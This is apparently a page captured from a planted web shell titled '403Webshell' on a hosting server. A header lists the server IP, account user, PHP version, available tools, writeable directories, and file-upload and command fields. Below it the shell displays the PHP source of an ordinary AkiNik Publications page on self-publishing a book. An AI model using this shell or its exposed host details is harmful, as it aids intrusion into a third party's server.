403Webshell
Server IP : 192.169.170.185  /  Your IP : 216.73.216.97
Web Server : Apache
System : Linux p3plmcpnl495852.prod.phx3.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User : akhilnew ( 1712764)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/akhilnew/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/akhilnew/public_html/self-publishing-a-book.php
<?php
require_once('header.php');
echo '<div class="row head main"><div class="col s12 m12 l12 center-align"><h1>'.$pagetitle.'</h1></div></div>';
?>

<?php
$countries = '';
$stmt = $mysqli->prepare("SELECT nicename, phonecode FROM country WHERE phonecode != '0' ORDER BY nicename");
$stmt->execute();
$stmt->store_result();
$stmt->bind_result($nicename, $phonecode);
while($stmt->fetch()):
	$countries .= '<option value="' . $phonecode . '" ' . ($phonecode == '91' ? 'selected' : '') . '>' . $nicename . '</option>';
endwhile;
$stmt->close();
?>

<style>
.spab .card.card-desinger{background: #e1e9ef;border-radius: 16px;overflow: hidden;margin: 0;}
.spab .card.card-desinger > .card-content{display: flex;align-items: start;justify-content: start;column-gap: 50px;}
.spab .card.card-desinger > .card-content.align-items-center{align-items: center;}
.spab .card.card-desinger > .card-content ul.browser-default{padding: 0 0 0 25px;}
.spab .card.card-desinger > .card-content ul.browser-default li:not(:last-child){margin-bottom: 10px;}
.spab .card.card-desinger > .card-content img.desinger{transition: transform 0.7s ease;min-width: 320px;}
.spab .card.card-desinger > .card-content img.desinger:hover{transform: scale(1.1);}
.spab .card.card-desinger .card-content label{text-transform: uppercase;color: #333;}
.spab .card.card-desinger .card-content .form-control{height: 36px !important;border: 1px solid #97a0ac !important;box-shadow: none !important;outline: none;padding: 6px !important;width: 100%;float: left;border-radius: 4px;margin: 0;background: #fff;}

.contact-section{display: flex;align-items: center;flex-direction: row;}

.ribbon{font-size: 18px;color: #fff;}
.ribbon{--r: .8em;border-block: .5em solid #0000;padding-inline: .5em calc(var(--r) + .25em);line-height: 1.8;clip-path: polygon(100% 0,0 0,0 100%,100% 100%,100% calc(100% - .25em),calc(100% - var(--r)) 50%,100% .25em);width: fit-content;}
.ribbon.step-1{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#ff4d59 padding-box;}
.ribbon.step-2{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#00c4a9 padding-box;}
.ribbon.step-3{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#ff6b6b padding-box;}
.ribbon.step-4{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#0d4fa1 padding-box;}
.ribbon.step-5{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#a2d33b padding-box;}
.ribbon.step-6{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#ffc902 padding-box;}
.ribbon.step-7{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#4a4cf6 padding-box;}
.ribbon.step-8{background: radial-gradient(.2em 50% at left,#000a,#0000) border-box,#4660b6 padding-box;}

.pubsplateforms{display:flex;flex-wrap: wrap;margin: 0 -12px;row-gap: 24px;}
.pubsplateforms > *{width: 33.3333%;padding: 0 12px;}

.spabenqbtn{display: inline-flex;align-items: center;column-gap: 5px;font-weight: 500;padding: 8px 12px;border-radius: 6px;color: #fff !important;font-size: 14px;background: #25d366;border: 2px solid #f00;animation: blinker 1s linear infinite;}
@keyframes blinker {
	0% {border-color: #ffd800;}
	50% {border-color: #f00;}
	100% {border-color: #ffd800;}
}

.whatsappsupport{background: #5583a9;border-radius: 16px;}
.whatsappsupport .card-content{display: flex;align-items: center;justify-content: space-between;}
.whatsappsupport .card-content span{text-transform: uppercase;}

@media (max-width:768px) {
	.pubsplateforms > *{width: 50%;}
	.whatsappsupport .card-content{flex-direction: column;text-align: center;row-gap: 15px;}
	.whatsappsupport .card-content span{font-size: 24px !important;}
}
@media (max-width:600px) {
	.spab .card.card-desinger > .card-content{align-items: center;justify-content: start;row-gap: 50px;flex-direction: column;}
	.spab .card.card-desinger > .card-content .order-0{order: 1;}
	.spab .card.card-desinger > .card-content .order-1{order: 0;}
	.contact-section{flex-direction: column;row-gap: 20px;}
	.pubsplateforms > *{width: 100%;}
}
</style>
<div class="spab">
	<div>
		<p>Thinking of self-publishing a book? You're in good company! The self-publishing revolution has given writers from all over the world the power to control their creative destinies. Gone are the days when traditional publishing houses held the keys to getting your story out into the world. Now, with the right tools and strategy, you can publish your own work and reach readers on your own terms. But where do you begin? This guide breaks down everything you need to know about self-publishing, so by the end, you'll be ready to hit "publish" with confidence.</p>
	</div>
	<br clear="both"><br clear="both">
	<div class="row contact-section">
		<div class="col s12 m6 l6">
			<img src="https://www.akinik.com/images/self-publishing-a-book-enquiry.jpg" alt="Self-publishing a book" title="Self-publishing a book" class="desinger">
		</div>
		<div class="col s12 m6 l6">
			<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
				<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
				<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH]'); ?>" autocomplete="off" readonly />
				<input type="hidden" name="zipcode" value="" readonly />
				<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
				<div class="card card-desinger">
					<div class="card-content">
						<div style="width: 100%;row-gap: 15px;display: flex;flex-direction: column;">
							<div class="card-title center-align" style="font-weight: 500;">Get in Touch!</div>
							<div class="row">
								<div class="col s12 m6 l6">
									<label for="name">name</label>
									<input type="text" name="name" id="name" class="form-control" />
								</div>
								<div class="col s12 m6 l6">
									<label for="email">email</label>
									<input type="text" name="email" id="email" class="form-control" />
								</div>
							</div>
							<div class="row">
								<div class="col s12 m6 l6">
									<label for="country">country</label>
									<select name="country" id="country" class="browser-default form-control">
										<option value="" selected="selected">Select country</option>
										<?php echo $countries; ?>
									</select>
								</div>
								<div class="col s12 m6 l6">
									<label for="phone">WhatsApp Number</label>
									<input type="text" name="phone" id="phone" class="form-control" />
								</div>
							</div>
							<div class="row">
								<div class="col s12 m12 l12">
									<label for="message">message</label>
									<textarea rows="5" cols="5" name="message" id="message" class="form-control" style="height: 100px !important;"></textarea>
								</div>
							</div>
							<div class="row">
								<div class="col s12 m12 l12">
									<label for="skycolor">What is color of sky in day? (Anti Spam Question)</label>
									<select name="skycolor" class="browser-default form-control">
										<option value="" selected>Select sky color</option>
										<option value="blue">Blue</option>
										<option value="black">Black</option>
										<option value="green">Green</option>
										<option value="orange">Orange</option>
									</select>
								</div>
							</div>
						</div>
					</div>
					<div class="card-action">
						<button style="width: 100%;" type="submit" name="submit" class="waves-effect btn-flat blue accent-3 white-text" disabled>submit</button>
					</div>
				</div>
			</form>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content">
			<div class="order-0">
				<h4 class="ribbon step-1">Step 1: Plan Your Book</h4>
				<br clear="both">
				<p>Before Self-Publishing a Book you even put pen to paper (or fingers to keyboard), you need a solid plan. This means answering critical questions like:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Who is your target audience?</strong> (What type of reader would enjoy your book?)</li>
					<li><strong>What's your book's genre?</strong> (Fiction? Non-fiction? Sci-fi? Romance?)</li>
					<li><strong>How long will your book be?</strong> (Will it be a short novella or a full-length novel?)</li>
					<li><strong>Why are you writing this book?</strong> (What message or story do you want to share?)</li>
				</ul>
			</div>
			<div class="order-1">
				<img src="https://www.akinik.com/images/plan-your-book.png" alt="Plan your book to self-publishing a book" title="Plan your book to self-publishing a book" class="desinger">
			</div>
        </div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card z-depth-0 whatsappsupport">
		<div class="card-content">
			<span style="font-size:24px;font-weight:500;color:#fff;">Author Support Available (24x7) Toll Free: 1800-1234-070</span>
			<a href="https://wa.me/919911215212?text=Hi, I have a query regarding self-publishing a book." target="_blank" class="spabenqbtn">
				<svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="24" height="24" viewBox="0 0 24 24">
					<path fill="#ffffff" d="M 12.011719 2 C 6.5057187 2 2.0234844 6.478375 2.0214844 11.984375 C 2.0204844 13.744375 2.4814687 15.462563 3.3554688 16.976562 L 2 22 L 7.2324219 20.763672 C 8.6914219 21.559672 10.333859 21.977516 12.005859 21.978516 L 12.009766 21.978516 C 17.514766 21.978516 21.995047 17.499141 21.998047 11.994141 C 22.000047 9.3251406 20.962172 6.8157344 19.076172 4.9277344 C 17.190172 3.0407344 14.683719 2.001 12.011719 2 z M 12.009766 4 C 14.145766 4.001 16.153109 4.8337969 17.662109 6.3417969 C 19.171109 7.8517969 20.000047 9.8581875 19.998047 11.992188 C 19.996047 16.396187 16.413812 19.978516 12.007812 19.978516 C 10.674812 19.977516 9.3544062 19.642812 8.1914062 19.007812 L 7.5175781 18.640625 L 6.7734375 18.816406 L 4.8046875 19.28125 L 5.2851562 17.496094 L 5.5019531 16.695312 L 5.0878906 15.976562 C 4.3898906 14.768562 4.0204844 13.387375 4.0214844 11.984375 C 4.0234844 7.582375 7.6067656 4 12.009766 4 z M 8.4765625 7.375 C 8.3095625 7.375 8.0395469 7.4375 7.8105469 7.6875 C 7.5815469 7.9365 6.9355469 8.5395781 6.9355469 9.7675781 C 6.9355469 10.995578 7.8300781 12.182609 7.9550781 12.349609 C 8.0790781 12.515609 9.68175 15.115234 12.21875 16.115234 C 14.32675 16.946234 14.754891 16.782234 15.212891 16.740234 C 15.670891 16.699234 16.690438 16.137687 16.898438 15.554688 C 17.106437 14.971687 17.106922 14.470187 17.044922 14.367188 C 16.982922 14.263188 16.816406 14.201172 16.566406 14.076172 C 16.317406 13.951172 15.090328 13.348625 14.861328 13.265625 C 14.632328 13.182625 14.464828 13.140625 14.298828 13.390625 C 14.132828 13.640625 13.655766 14.201187 13.509766 14.367188 C 13.363766 14.534188 13.21875 14.556641 12.96875 14.431641 C 12.71875 14.305641 11.914938 14.041406 10.960938 13.191406 C 10.218937 12.530406 9.7182656 11.714844 9.5722656 11.464844 C 9.4272656 11.215844 9.5585938 11.079078 9.6835938 10.955078 C 9.7955938 10.843078 9.9316406 10.663578 10.056641 10.517578 C 10.180641 10.371578 10.223641 10.267562 10.306641 10.101562 C 10.389641 9.9355625 10.347156 9.7890625 10.285156 9.6640625 C 10.223156 9.5390625 9.737625 8.3065 9.515625 7.8125 C 9.328625 7.3975 9.131125 7.3878594 8.953125 7.3808594 C 8.808125 7.3748594 8.6425625 7.375 8.4765625 7.375 z"></path>
				</svg>
				WhatsApp Now
			</a>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content align-items-center">
			<div class="order-1">
				<img src="https://www.akinik.com/images/write-and-edit-your-manuscript.png" alt="Write and edit your manuscript to self-publishing a book" title="Write and edit your manuscript to self-publishing a book" class="desinger">
			</div>
			<div class="order-0">
				<h4 class="ribbon step-2">Step 2: Write and Edit Your Manuscript</h4>
				<br clear="both">
				<p>Self-Publishing a Book, the most important part—writing! Here are a few tips to keep in mind as you write:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Stick to a daily word count:</strong> Writing regularly keeps you in the groove.</li>
					<li><strong>Don't worry about perfection:</strong> Your first draft doesn't need to be flawless.</li>
					<li><strong>Take breaks:</strong> Step away from the manuscript to avoid burnout and come back with fresh eyes.</li>
				</ul>
				<br clear="both">
				<p>Once you've finished the first draft, it's time for the editing process:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Self-edit first:</strong> Look for spelling and grammar issues, awkward sentence structures, and plot holes.</li>
					<li><strong>Hire a professional editor:</strong> Even if you're self-publishing, you want a polished product. A good editor will refine your story and improve readability.</li>
				</ul>
			</div>
        </div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content align-items-center">
			<div class="order-0">
				<h4 class="ribbon step-3">Step 3: Format Your Book for Publishing</h4>
				<br clear="both">
				<p>In Self-Publishing a Book, Formatting is often one of the trickiest steps in self-publishing. It's crucial because a poorly formatted book can make even a great story hard to read. Depending on whether you're publishing an eBook, paperback, or hardcover, formatting needs to be done correctly.</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>eBook formatting</strong> Ensure your book is easy to read on various devices (Kindle, iPads, smartphones). Tools like Scrivener or Vellum can help.</li>
					<li><strong>Print formatting:</strong> This includes things like page size, margins, and how the text flows. Most publishing platforms offer templates that can make this easier.</li>
				</ul>
			</div>
			<div class="order-1">
				<img src="https://www.akinik.com/images/format-your-book-for-publishing.png" alt="Format your book to self-publishing a book" title="Format your book to self-publishing a book" class="desinger">
			</div>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card z-depth-0 whatsappsupport">
		<div class="card-content">
			<span style="font-size:24px;font-weight:500;color:#fff;">Author Support Available (24x7) Toll Free: 1800-1234-070</span>
			<a href="https://wa.me/919911215212?text=Hi, I have a query regarding self-publishing a book." target="_blank" class="spabenqbtn">
				<svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="24" height="24" viewBox="0 0 24 24">
					<path fill="#ffffff" d="M 12.011719 2 C 6.5057187 2 2.0234844 6.478375 2.0214844 11.984375 C 2.0204844 13.744375 2.4814687 15.462563 3.3554688 16.976562 L 2 22 L 7.2324219 20.763672 C 8.6914219 21.559672 10.333859 21.977516 12.005859 21.978516 L 12.009766 21.978516 C 17.514766 21.978516 21.995047 17.499141 21.998047 11.994141 C 22.000047 9.3251406 20.962172 6.8157344 19.076172 4.9277344 C 17.190172 3.0407344 14.683719 2.001 12.011719 2 z M 12.009766 4 C 14.145766 4.001 16.153109 4.8337969 17.662109 6.3417969 C 19.171109 7.8517969 20.000047 9.8581875 19.998047 11.992188 C 19.996047 16.396187 16.413812 19.978516 12.007812 19.978516 C 10.674812 19.977516 9.3544062 19.642812 8.1914062 19.007812 L 7.5175781 18.640625 L 6.7734375 18.816406 L 4.8046875 19.28125 L 5.2851562 17.496094 L 5.5019531 16.695312 L 5.0878906 15.976562 C 4.3898906 14.768562 4.0204844 13.387375 4.0214844 11.984375 C 4.0234844 7.582375 7.6067656 4 12.009766 4 z M 8.4765625 7.375 C 8.3095625 7.375 8.0395469 7.4375 7.8105469 7.6875 C 7.5815469 7.9365 6.9355469 8.5395781 6.9355469 9.7675781 C 6.9355469 10.995578 7.8300781 12.182609 7.9550781 12.349609 C 8.0790781 12.515609 9.68175 15.115234 12.21875 16.115234 C 14.32675 16.946234 14.754891 16.782234 15.212891 16.740234 C 15.670891 16.699234 16.690438 16.137687 16.898438 15.554688 C 17.106437 14.971687 17.106922 14.470187 17.044922 14.367188 C 16.982922 14.263188 16.816406 14.201172 16.566406 14.076172 C 16.317406 13.951172 15.090328 13.348625 14.861328 13.265625 C 14.632328 13.182625 14.464828 13.140625 14.298828 13.390625 C 14.132828 13.640625 13.655766 14.201187 13.509766 14.367188 C 13.363766 14.534188 13.21875 14.556641 12.96875 14.431641 C 12.71875 14.305641 11.914938 14.041406 10.960938 13.191406 C 10.218937 12.530406 9.7182656 11.714844 9.5722656 11.464844 C 9.4272656 11.215844 9.5585938 11.079078 9.6835938 10.955078 C 9.7955938 10.843078 9.9316406 10.663578 10.056641 10.517578 C 10.180641 10.371578 10.223641 10.267562 10.306641 10.101562 C 10.389641 9.9355625 10.347156 9.7890625 10.285156 9.6640625 C 10.223156 9.5390625 9.737625 8.3065 9.515625 7.8125 C 9.328625 7.3975 9.131125 7.3878594 8.953125 7.3808594 C 8.808125 7.3748594 8.6425625 7.375 8.4765625 7.375 z"></path>
				</svg>
				WhatsApp Now
			</a>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content">
			<div class="order-1">
				<img src="https://www.akinik.com/images/design-your-book-cover.png" alt="Design your book cover to self-publishing a book" title="Design your book cover to self-publishing a book" class="desinger">
			</div>
			<div class="order-0">
				<h4 class="ribbon step-4">Step 4: Design Your Book Cover</h4>
				<br clear="both">
				<p>You've probably heard the phrase, “Don't judge a book by its cover.” Well, most readers do! Your cover design needs to grab attention and reflect your book's genre and theme. Here's how to ensure your cover is on point:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Hire a professional cover designer:</strong> They know the trends and what appeals to readers in your genre.</li>
					<li><strong>DIY:</strong> If you're feeling creative, tools like Canva can help you design a basic cover, though it's usually worth the investment to hire a pro.</li>
				</ul>
				<br clear="both">
				<p>Make sure your book cover is visually appealing, uses high-quality images, and has a readable font, especially for eBooks displayed as thumbnails on online stores.</p>
			</div>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content align-items-center">
			<div style="width:100%;">
				<h4 class="ribbon step-5">Step 5: Choose Your Publishing Platform</h4>
				<br clear="both">
				<p>Now it's time to actually publish your book. There are several self-publishing platforms you can choose from, depending on your goals:</p>
				<br clear="both">
				<b style="display:flex;align-items:center;column-gap:5px;">Best Book Publishing Companies <span class="material-icons">east</span></b>
				<br clear="both">
				<div class="pubsplateforms">
					<div>
						<div class="card z-depth-0" style="border-radius: 12px;margin:0">
							<div class="card-content">
								<img src="https://www.akinik.com/images/akkiniknewlogo.png" alt="Akinik Publications" title="Akinik Publications" style="height: 50px;" />
								<br clear="both">
								<br clear="both">
								<p><b>AkiNik Publications:</b> AkiNik Publications is a globally recognized publishing house, particularly known for academic and research books. They offer a wide range of publishing services, from scientific journals to books across various disciplines. If you're an academic author or writing non-fiction in fields like science, engineering, or social studies, AkiNik could be a solid choice.</p>
								<br clear="both">
								<div style="line-height:24px;">
									<b>Book Publishing Support:</b>
									<p><b>Toll-Free:</b><a href="tel:1800-1234-070">1800-1234-070</a> (10AM - 06PM)</p>
									<p><b>Email:</b> <a href="mailto:akinikbooks@gmail.com">akinikbooks@gmail.com</a></p>
									<p><b>Website:</b> <a href="https://www.akinik.com">https://www.akinik.com</a></p>
								</div>
							</div>
						</div>
					</div>
					<div>
						<div class="card z-depth-0" style="border-radius: 12px;margin:0">
							<div class="card-content">
								<img src="https://www.akinik.com/images/brightskypublications_logo.png" alt="Bright Sky Publications" title="Bright Sky Publications" style="height: 50px;" />
								<br clear="both">
								<br clear="both">
								<p><b>Bright Sky Publications:</b> Bright Sky Publications focuses on mainstream for academic and research books. Their aim is to help authors produce high-quality books while maintaining full control over the creative process. Bright Sky offers extensive support through every step of self-publishing, making them ideal for first-time authors.</p>
								<br clear="both">
								<div style="line-height:24px;">
									<b>Book Publishing Support:</b>
									<p><b>Phone:</b><a href="tel:+91-8750002051">+91-8750002051</a> (10AM - 06PM)</p>
									<p><b>Email:</b> <a href="mailto:brightskypublications@gmail.com">brightskypublications@gmail.com</a></p>
									<p><b>Website:</b> <a href="https://www.bspublications.com">https://www.bspublications.com</a></p>
								</div>
							</div>
						</div>
					</div>
					<div>
						<div class="card z-depth-0" style="border-radius: 12px;margin:0">
							<div class="card-content">
								<img src="https://www.akinik.com/images/integratedpublications_logo.png" alt="Integrated Publications" title="Integrated Publications" style="height: 50px;" />
								<br clear="both">
								<br clear="both">
								<p><b>Integrated Publications:</b> Integrated Publications is known for its professional approach to publishing across a range of genres. Whether you're writing fiction, non-fiction, or even academic books, they have options tailored to suit every author's needs. Their services are particularly focused on high-quality book production and robust distribution networks.</p>
								<br clear="both">
								<div style="line-height:24px;">
									<b>Book Publishing Support:</b>
									<p><b>Phone:</b><a href="tel:+91-9953533410">+91-9953533410</a> (10AM - 06PM)</p>
									<p><b>Email:</b> <a href="mailto:printintegrated@gmail.com">printintegrated@gmail.com</a></p>
									<p><b>Website:</b> <a href="https://www.integratedpublications.in">https://www.integratedpublications.in</a></p>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card z-depth-0 whatsappsupport">
		<div class="card-content">
			<span style="font-size:24px;font-weight:500;color:#fff;">Author Support Available (24x7) Toll Free: 1800-1234-070</span>
			<a href="https://wa.me/919911215212?text=Hi, I have a query regarding self-publishing a book." target="_blank" class="spabenqbtn">
				<svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="24" height="24" viewBox="0 0 24 24">
					<path fill="#ffffff" d="M 12.011719 2 C 6.5057187 2 2.0234844 6.478375 2.0214844 11.984375 C 2.0204844 13.744375 2.4814687 15.462563 3.3554688 16.976562 L 2 22 L 7.2324219 20.763672 C 8.6914219 21.559672 10.333859 21.977516 12.005859 21.978516 L 12.009766 21.978516 C 17.514766 21.978516 21.995047 17.499141 21.998047 11.994141 C 22.000047 9.3251406 20.962172 6.8157344 19.076172 4.9277344 C 17.190172 3.0407344 14.683719 2.001 12.011719 2 z M 12.009766 4 C 14.145766 4.001 16.153109 4.8337969 17.662109 6.3417969 C 19.171109 7.8517969 20.000047 9.8581875 19.998047 11.992188 C 19.996047 16.396187 16.413812 19.978516 12.007812 19.978516 C 10.674812 19.977516 9.3544062 19.642812 8.1914062 19.007812 L 7.5175781 18.640625 L 6.7734375 18.816406 L 4.8046875 19.28125 L 5.2851562 17.496094 L 5.5019531 16.695312 L 5.0878906 15.976562 C 4.3898906 14.768562 4.0204844 13.387375 4.0214844 11.984375 C 4.0234844 7.582375 7.6067656 4 12.009766 4 z M 8.4765625 7.375 C 8.3095625 7.375 8.0395469 7.4375 7.8105469 7.6875 C 7.5815469 7.9365 6.9355469 8.5395781 6.9355469 9.7675781 C 6.9355469 10.995578 7.8300781 12.182609 7.9550781 12.349609 C 8.0790781 12.515609 9.68175 15.115234 12.21875 16.115234 C 14.32675 16.946234 14.754891 16.782234 15.212891 16.740234 C 15.670891 16.699234 16.690438 16.137687 16.898438 15.554688 C 17.106437 14.971687 17.106922 14.470187 17.044922 14.367188 C 16.982922 14.263188 16.816406 14.201172 16.566406 14.076172 C 16.317406 13.951172 15.090328 13.348625 14.861328 13.265625 C 14.632328 13.182625 14.464828 13.140625 14.298828 13.390625 C 14.132828 13.640625 13.655766 14.201187 13.509766 14.367188 C 13.363766 14.534188 13.21875 14.556641 12.96875 14.431641 C 12.71875 14.305641 11.914938 14.041406 10.960938 13.191406 C 10.218937 12.530406 9.7182656 11.714844 9.5722656 11.464844 C 9.4272656 11.215844 9.5585938 11.079078 9.6835938 10.955078 C 9.7955938 10.843078 9.9316406 10.663578 10.056641 10.517578 C 10.180641 10.371578 10.223641 10.267562 10.306641 10.101562 C 10.389641 9.9355625 10.347156 9.7890625 10.285156 9.6640625 C 10.223156 9.5390625 9.737625 8.3065 9.515625 7.8125 C 9.328625 7.3975 9.131125 7.3878594 8.953125 7.3808594 C 8.808125 7.3748594 8.6425625 7.375 8.4765625 7.375 z"></path>
				</svg>
				WhatsApp Now
			</a>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content align-items-center">
			<div class="order-0">
				<h4 class="ribbon step-6">Step 6: Upload Your Book and Metadata</h4>
				<br clear="both">
				<p>After choosing your platform, you'll need to upload your book files (both the manuscript and cover). At this stage, you'll also enter important metadata—this includes your book's title, author name, genre, keywords, and book description. This is crucial for SEO and discoverability, so take your time here.</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Keywords</strong> Research relevant keywords that your target audience might search for. This could be genre-specific terms or niche subjects.</li>
					<li><strong>Book Description:</strong> Write a compelling description that hooks readers without giving away too much. This is often the first thing potential buyers read after the title.</li>
				</ul>
			</div>
			<div class="order-1">
				<img src="https://www.akinik.com/images/upload-your-book-and-metadata.png" alt="Upload your book and metadata to self-publishing a book" title="Upload your book and metadata to self-publishing a book" class="desinger">
			</div>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content align-items-center">
			<div class="order-1">
				<img src="https://www.akinik.com/images/promote-and-market-your-book.png" alt="Promote and Market Your Book" title="Promote and Market Your Book" class="desinger">
			</div>
			<div class="order-0">
				<h4 class="ribbon step-7">Step 7: Promote and Market Your Book</h4>
				<br clear="both">
				<p>Now that your book is published, it's time to get it in front of readers. Effective marketing is key to making sure your book doesn't get lost in the crowd. Here are some strategies to consider:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Social media marketing:</strong> Build an audience on platforms like Instagram, Twitter, or Facebook. Share sneak peeks, behind-the-scenes content, or hold giveaways to create buzz.</li>
					<li><strong>Author website:</strong> Create a professional website where you can showcase your book, connect with readers, and even sell directly.</li>
					<li><strong>Email marketing:</strong> Build an email list of interested readers and keep them updated about your book release, special offers, and future projects.</li>
					<li><strong>Book promotion services:</strong> Sites like BookBub or Bargain Booksy offer paid promotions to help get your book in front of more readers.</li>
				</ul>
			</div>
		</div>
	</div>

	<br clear="both"><br clear="both">

	<div class="inlineform">
		<h2 class="inlineformtitle">Publish your book in 15 days!</h2>

		<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="contactform" onsubmit="return pageform(this)">
			<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
			<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH_INLINE]'); ?>" autocomplete="off" readonly />
			<input type="hidden" name="zipcode" value="" readonly />
			<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
			<div class="flexible">
				<div class="input-group">
					<input type="text" name="name" id="name" class="form-control" placeholder="Full name" />
				</div>
				<div class="input-group">
					<input type="text" name="email" id="email" class="form-control" placeholder="Email address" />
				</div>
				<div class="input-group">
					<select name="country" class="browser-default">
						<option value="" selected="selected">Select country</option>
						<?php echo $countries; ?>
					</select>
				</div>
				<div class="input-group">
					<input type="text" name="phone" id="phone" class="form-control" placeholder="WhatsApp number" />
				</div>
				<div class="input-group">
					<input type="text" name="message" id="message" class="form-control" placeholder="Message" />
				</div>
			</div>
			<div class="flexible" style="margin-top: 15px;">
				<button type="submit" name="submit" class="waves-effect btn-flat black white-text" disabled>submit</button>
			</div>
		</form>
	</div>

	<br clear="both"><br clear="both">

	<div class="card card-desinger">
		<div class="card-content">
			<div class="order-0">
				<h4 class="ribbon step-8">Step 8: Gather Reviews and Feedback</h4>
				<br clear="both">
				<p>One of the most important aspects of post-launch promotion is gathering reviews. Readers trust books with lots of reviews, so encourage your audience to leave feedback on Amazon, Goodreads, or your website. Here's how:</p>
				<br clear="both">
				<ul class="browser-default">
					<li><strong>Ask friends and family:</strong> Get the ball rolling by asking people you know to leave an honest review.</li>
					<li><strong>Offer free copies:</strong> Send out free copies to bloggers or influencers in exchange for an honest review.</li>
					<li><strong>Engage with your readers:</strong> Respond to reviews (especially on Goodreads) and show appreciation for feedback, whether it's good or bad.</li>
				</ul>
			</div>
			<div class="order-1">
				<img src="https://www.akinik.com/images/gather-reviews-and-feedback.png" alt="Gather Reviews and Feedback" title="Gather Reviews and Feedback" class="desinger">
			</div>
		</div>
	</div>
	
	<br clear="all">
	<br clear="all">
	<div class="row contact-section">
		<div class="col s12 m6 l6">
			<img src="https://www.akinik.com/images/self-publishing-a-book-enquiry.jpg" alt="Self-publishing a book" title="Self-publishing a book" class="desinger">
		</div>
		<div class="col s12 m6 l6">
			<form action="<?php echo $baseurl; ?>self-publishing-a-book" method="post" name="bookuploadform" onsubmit="return pageform(this)">
				<input type="hidden" name="<?php echo $token_id; ?>" value="<?php echo $token_value; ?>" autocomplete="off" readonly />
				<input type="hidden" name="focus" value="<?php echo $en->encrypt('[SELF_PUBLISH_UPLOAD]'); ?>" autocomplete="off" readonly />
				<input type="hidden" name="zipcode" value="" readonly />
				<input type="hidden" name="recaptcha_response" class="recaptchaResponse">
				<div class="card card-desinger">
					<div class="card-content">
						<div style="width: 100%;row-gap: 15px;display: flex;flex-direction: column;">
							<div class="card-title center-align" style="font-weight: 500;">Book & Book Chapter Submission Form</div>
							<div class="row">
								<div class="col s12 m6 l6">
									<label for="name">name</label>
									<input type="text" name="name" id="name" class="form-control" />
								</div>
								<div class="col s12 m6 l6">
									<label for="email">email</label>
									<input type="text" name="email" id="email" class="form-control" />
								</div>
							</div>
							<div class="row">
								<div class="col s12 m6 l6">
									<label for="phone">phone</label>
									<input type="text" name="phone" id="phone" class="form-control" />
								</div>
								<div class="col s12 m6 l6">
									<label for="file">file</label>
									<input type="file" name="file" id="file" class="form-control" />
								</div>
							</div>
							<div class="row">
								<div class="col s12 m12 l12">
									<label for="message">message</label>
									<textarea rows="5" cols="5" name="message" id="message" class="form-control" style="height: 100px !important;"></textarea>
								</div>
							</div>
							<div class="row">
								<div class="col s12 m12 l12">
									<label for="skycolor">What is color of sky in day? (Anti Spam Question)</label>
									<select name="skycolor" class="browser-default form-control">
										<option value="" selected>Select sky color</option>
										<option value="blue">Blue</option>
										<option value="black">Black</option>
										<option value="green">Green</option>
										<option value="orange">Orange</option>
									</select>
								</div>
							</div>
						</div>
					</div>
					<div class="card-action">
						<button style="width: 100%;" type="submit" name="submit" class="waves-effect btn-flat blue accent-3 white-text" disabled>publish book</button>
					</div>
				</div>
			</form>
		</div>
	</div>

	<br clear="all"><br clear="all">

	<div style="text-align:center;text-decoration:underline;">
		<h3 style="font-size:36px;">Frequently Asked Questions?</h3>
	</div>

	<br clear="all"><br clear="all">

	<div class="ab_accordion">
        <div class="ab_accordion_section">
            <div class="ab_accordion_header"><span>1. What kind of books does AkiNik Publications specialize in?</span> <span class="material-icons">arrow_drop_down</span></div>
            <div class="ab_accordion_content">
			AkiNik Publications primarily focuses on academic, research-based, and non-fiction books. They are an excellent choice for authors looking to publish in specialized fields like science, engineering, medicine, social sciences, and more. If you're writing a scholarly work or an in-depth research book, AkiNik Publications provides a platform that caters to these kinds of publications.
            </div>
